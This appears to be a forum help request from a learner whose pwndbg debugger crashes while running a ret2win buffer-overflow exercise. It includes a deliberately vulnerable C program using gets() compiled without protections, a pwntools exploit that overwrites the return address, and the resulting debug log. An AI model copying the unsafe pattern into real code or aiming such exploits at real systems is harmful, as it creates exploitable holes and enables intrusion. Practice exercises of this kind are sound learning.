OS: Arch Linux x86_64
This is my source code:
// gcc source.c -o vuln -no-pie -fno-stack-protector -z execstack -m32
#include <stdio.h>
void unsafe() {
char buffer[40];
puts("Overflow me");
gets(buffer);
}
void main() {
unsafe();
}
void flag() {
puts("Exploited!!!!!");
}
This is my exploit script:
from pwn import *
context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['alacritty', '-e']
p = process('./vuln')
gdb.attach(p, 'b *0x080491aa')
payload = b'A' * 52
payload += p32(0x080491c3)
pause()
p.sendline(payload)
p.interactive()
Here is the commands i used in pwndbg interface:
pwndbg> r
Starting program: /home/cub3y0nd/Downloads/ret2win/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Overflow me
After use r command, i send new line in the exploit interface, then pwndbg crashed. This is exploit interface's contents:
λ ~ python exp.py
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb']
[DEBUG] Created script for new terminal:
#!/usr/bin/python
import os
os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb'], os.environ)
[DEBUG] Launching a new terminal: ['/usr/bin/alacritty', '-e', '/tmp/tmpikuhhld1']
[+] Waiting for debugger: Done
[*] Paused (press any to continue)
[DEBUG] Sent 0x39 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000030 41 41 41 41 c3 91 04 08 0a │AAAA│····│·│
00000039
[*] Process './vuln' stopped with exit code -9 (SIGKILL) (pid 175664)
Traceback (most recent call last):
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 702, in send_raw
self.proc.stdin.flush()
BrokenPipeError: [Errno 32] Broken pipe
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/cub3y0nd/Downloads/ret2win/exp.py", line 16, in <module>
p.sendline(payload)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 816, in sendline
self.send(line + self.newline)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 795, in send
self.send_raw(data)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 704, in send_raw
raise EOFError
EOFError
I tried the same thing on other computer, but normal, pwndbg didn't crash.
I don't know where the problem is, I tried reinstall pwndbg and pwntools but that didn't solve the problem.
And everytime i open pwndbg i receive this warning: /usr/share/pwndbg/gdbinit.py:10: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html import pkg_resources. I don't know if this warning affects anything.
Please tell me how to solve this pwndbg hook debugging problem.
